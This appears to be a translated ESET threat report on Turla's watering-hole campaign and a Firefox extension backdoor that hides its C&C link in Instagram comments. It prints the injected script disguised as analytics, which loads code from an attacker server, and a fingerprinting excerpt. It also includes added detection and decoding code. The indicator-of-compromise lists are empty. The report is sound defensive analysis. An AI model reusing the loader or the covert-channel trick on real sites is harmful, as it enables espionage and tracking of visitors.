
Turla's cybercamping: updated Firefox extension uses Instagram

Some APT attack schemes do not change over the years. One example is the watering hole attacks carried out by the Turla group. This group specialises in cyber espionage; its main targets are government and diplomatic institutions. The attackers have been using the watering hole scheme to redirect potential victims to their C & C infrastructure since at least 2014, occasionally making small changes to how it works.



We at ESET have been following the Turla campaigns and recently noticed that the group has returned to a method it had abandoned for several months.

The initial stages of compromise


The indicators of compromise section below lists sites that Turla has used in watering hole attacks in the past. As is characteristic of this group, many of the sites belong to embassies of various countries.

The redirect is performed by a code snippet that the attackers add to the original page. The scripts we discovered in the last few months look like this:

    <!-- Clicky Web Analytics (start) -->
    <script type="text/javascript">// <![CDATA[
    var clicky_site_ids = clicky_site_ids || [];
    clicky_site_ids.push(100673048);
    (function() {
      var s = document.createElement('script');
      var a = 'http://www.mentalhealthcheck.net/';
      var b = 'update/counter.js';
      s.type = 'text/javascript';
      s.async = true;
      s.src = '//static.getclicky.com/js';
      s.src = a.concat(b);
      ( document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(s);
    })();
    // ]]></script>

It is noteworthy that the attackers included a reference to Clicky, a web analytics application. This probably makes the script look legitimate to a non-expert, although the application itself plays no part in the attack.

The added script loads another script from mentalhealthcheck.net/update/counter.js. Turla uses this server to deliver fingerprinting scripts to victims, which collect information about the system they run on. A reference to the Google Analytics script was used in the same way, but lately we see Clicky more often. The indicators of compromise section lists the C & C servers we have discovered in recent months; they are originally legitimate servers that have been compromised.
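A static check for the loader pattern just described, written here as an added example (not code from the article or from ESET): the snippet claims to be a Clicky loader, assigns the genuine analytics host to s.src, and then overwrites it with a URL built by concatenation. The sample snippet and the claimed-host list are constructed for this example.

```javascript
// Added example: flag a "branded" analytics loader whose script src is
// first set to the claimed analytics host and then silently overwritten
// with another host built from concatenated variables.
// SAMPLE_SNIPPET is a constructed copy of the injected code quoted above.
const SAMPLE_SNIPPET = `
var s = document.createElement('script');
var a = 'http://www.mentalhealthcheck.net/';
var b = 'update/counter.js';
s.src = '//static.getclicky.com/js';
s.src = a.concat(b);
`;

// Hosts the snippet's branding claims it loads from (assumed list).
const CLAIMED_ANALYTICS_HOSTS = ["static.getclicky.com", "www.google-analytics.com"];

// Resolve a string literal or an `x.concat(y)` expression to a URL, using
// the `var name = '...'` declarations found in the same snippet.
function resolveValue(expr, vars) {
  const lit = expr.match(/^['"]([^'"]*)['"]$/);
  if (lit) return lit[1];
  const cat = expr.match(/^(\w+)\.concat\((\w+)\)$/);
  if (cat && vars[cat[1]] !== undefined && vars[cat[2]] !== undefined) {
    return vars[cat[1]] + vars[cat[2]];
  }
  return null;
}

// Extract the host from an absolute or protocol-relative URL.
function hostOf(url) {
  const m = url.match(/^(?:https?:)?\/\/([^/]+)/);
  return m ? m[1].toLowerCase() : null;
}

// Returns every host assigned to `.src`, in order, plus a verdict: the
// snippet is suspicious when a claimed analytics host is later replaced
// by a host that is not on the claimed list.
function analyseLoader(snippet) {
  const vars = {};
  for (const m of snippet.matchAll(/var\s+(\w+)\s*=\s*['"]([^'"]*)['"]/g)) vars[m[1]] = m[2];
  const hosts = [];
  for (const m of snippet.matchAll(/\.src\s*=\s*([^;]+);/g)) {
    const url = resolveValue(m[1].trim(), vars);
    if (url) hosts.push(hostOf(url));
  }
  const claimedIdx = hosts.findIndex((h) => CLAIMED_ANALYTICS_HOSTS.includes(h));
  const overwritten = claimedIdx >= 0 &&
    hosts.slice(claimedIdx + 1).some((h) => !CLAIMED_ANALYTICS_HOSTS.includes(h));
  return { hosts, suspicious: overwritten, finalHost: hosts[hosts.length - 1] || null };
}
```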

The next stage is delivering the JavaScript fingerprinting script to potential victims. To do this, the C & C server filters visitors by IP address: a visitor from a targeted IP range receives the fingerprinting script, while anyone else receives a harmless one. Below is an excerpt from the script that targeted users receive:

    function cb_custom() {
      loadScript("http://www.mentalhealthcheck.net/script/pde.js", cb_custom1);
    }
    function cb_custom1() {
      PluginDetect.getVersion('.');
      myResults['Java'] = PluginDetect.getVersion('Java');
      myResults['Flash'] = PluginDetect.getVersion('Flash');
      myResults['Shockwave'] = PluginDetect.getVersion('Shockwave');
      myResults['AdobeReader'] = PluginDetect.getVersion('AdobeReader') || PluginDetect.getVersion('PDFReader');
      var ec = new evercookie();
      ec.get('thread', getCookie)

The script downloads a JS library called PluginDetect, which collects information about the plugins installed in the browser. The collected information is then sent to the C & C server.

In addition, the script tries to set an evercookie, which tracks the user's browser activity across all sites.

For those familiar with Turla's watering hole attacks, it is obvious that the group continues to rely on proven methods.

Firefox extension


Some readers may remember the Pacifier APT report, which describes a spear-phishing attack using a malicious Word document sent to agencies around the world. The document then loaded a backdoor onto the system, which we now know to be Skipper, Turla's first-stage backdoor.

The report also describes a Firefox extension that is downloaded by the same type of malicious document, and it seems we have found a new version of this extension. It is a JavaScript backdoor whose implementation differs from the one described in the Pacifier APT report, but with similar functionality.



The malicious extension, named HTML5 Encoding, was distributed through the compromised website of a Swiss company. It is a simple backdoor, but it has an interesting way of reaching its C & C server.

Instagram use


HTML5 Encoding uses a bit.ly short URL to reach the C & C server, but that URL does not appear in its code. Instead, the extension obtains the address from comments on particular Instagram posts. In our example, it was a comment on a photo posted on Britney Spears's official account.


www.instagram.com/p/BO8gU41A45g

The extension examines each comment on the photo and computes a custom hash value for it. If the value equals 183, the extension runs the following regular expression on the comment to obtain the bit.ly URL:

(?:\\u200d(?:#|@)(\\w)

Among the comments on the photo, only one, posted on February 6, had a hash of 183, while the photo itself was posted in early January. Passing that comment through the regex yields the following bit.ly link: bit.ly/2kdhuHX

Looking at the regular expression more closely, we see that it looks for either @ or # or the Unicode character \200d, the invisible Zero Width Joiner, which is usually used to separate emoji. By copying the comment or examining its source, you can see a Zero Width Joiner before each character of the hidden address:

smith2155<200d>#2hot ma<200d>ke lovei<200d>d to <200d>her, <200d>uupss <200d>#Hot <200d>#X
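The decoding and a detection check for the mechanism described above, as an added example (not the extension's code and not from the article). The regex is my reading of the article's pattern: a ZWJ, an optional # or @, then one word character that is kept. The sample comment is constructed from the page's example with <200d> written as the real U+200D character.

```javascript
// Added example: recover the path hidden in an Instagram comment by
// Zero Width Joiners, and count ZWJs whose neighbours are plain ASCII
// (legitimate ZWJs sit between emoji code points, never between letters).
const ZWJ = "\u200d";

// Constructed from the comment quoted above, with <200d> as real U+200D.
const SAMPLE_COMMENT =
  "smith2155" + ZWJ + "#2hot ma" + ZWJ + "ke lovei" + ZWJ + "d to " + ZWJ +
  "her, " + ZWJ + "uupss " + ZWJ + "#Hot " + ZWJ + "#X";

// Keep the character following every ZWJ, skipping a leading # or @.
// My reading of the article's regex; not the extension's exact pattern.
function extractHiddenPath(comment) {
  const re = /\u200d[#@]?(\w)/g;
  let path = "";
  for (const m of comment.matchAll(re)) path += m[1];
  return path;
}

// Count ZWJs that touch printable ASCII on either side. Emoji sequences
// such as family glyphs use surrogate pairs, so they are not counted.
function countSuspiciousZwj(text) {
  let n = 0;
  const ascii = /^[\x20-\x7e]$/;
  for (let i = 0; i < text.length; i++) {
    if (text[i] !== ZWJ) continue;
    const prev = text[i - 1] || "";
    const next = text[i + 1] || "";
    if (ascii.test(prev) || ascii.test(next)) n++;
  }
  return n;
}

// Verdict for one comment: how many suspicious ZWJs it carries and, if any,
// the bit.ly path and short URL they encode.
function analyseComment(comment) {
  const zwj = countSuspiciousZwj(comment);
  const hiddenPath = zwj > 0 ? extractHiddenPath(comment) : "";
  return {
    suspiciousZwj: zwj,
    hiddenPath,
    shortUrl: hiddenPath ? "bit.ly/" + hiddenPath : null,
  };
}
```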

Following the short link leads to static.travelclothes.org/dolR_1ert.php. This address was used in past Turla watering hole attacks.

Click statistics are available for the bit.ly link:



Only 17 clicks were recorded in February, roughly coinciding with the publication of the comment. The small number of clicks may indicate that the attack is still in a testing stage.

Technical analysis


The Firefox extension is a simple backdoor. It collects information about the system and sends this data, encrypted with AES, to the C & C server. This matches the description of the extension in the Pacifier APT report.

The backdoor component can run four different types of commands:


In our estimation, the attacks are still being run in test mode. The next version of the extension, if one ever appears, will have to differ significantly from the current one. Several APIs used by the extension will disappear in future versions of Firefox: they are available only to legacy add-ons, which WebExtensions replace from Firefox 57 onwards. Starting with that version, Firefox no longer loads legacy add-ons, which rules out the use of these APIs.

Conclusion


Using social networks to obtain the C & C server address is quite remarkable. Besides Turla, other groups use this approach, including the Dukes.

The use of social networks makes building protection harder. First, attacker traffic to social networks is difficult to distinguish from legitimate traffic. Second, the method gives the attackers more flexibility: they can easily change C & C server addresses and remove traces of them.

It is interesting to see Turla returning to its old fingerprinting method while also looking for new ways to make its C & C servers harder to detect.

You can ask additional questions to researchers or submit malware samples related to the activities of the Turla group by emailing threatintel@eset.com.
Thanks to Clement Lecigne of Google's Threat Analysis Group for research assistance.

Indicators of Compromise (IoCs)


Firefox extension hashes:

html5.xpi 5ba7532b4c89cc3f7ffe15b6c0e5df82a34c22ea
html5.xpi 8e6c9e4582d18dd75162bcbc63e933db344c5680


Compromised sites redirecting to fingerprinting servers (at the time of writing, these were either clean again or led to non-operational servers):



Compromised sites used as first-stage C & C servers in the watering hole campaign:


Source: https://habr.com/ru/post/330446/
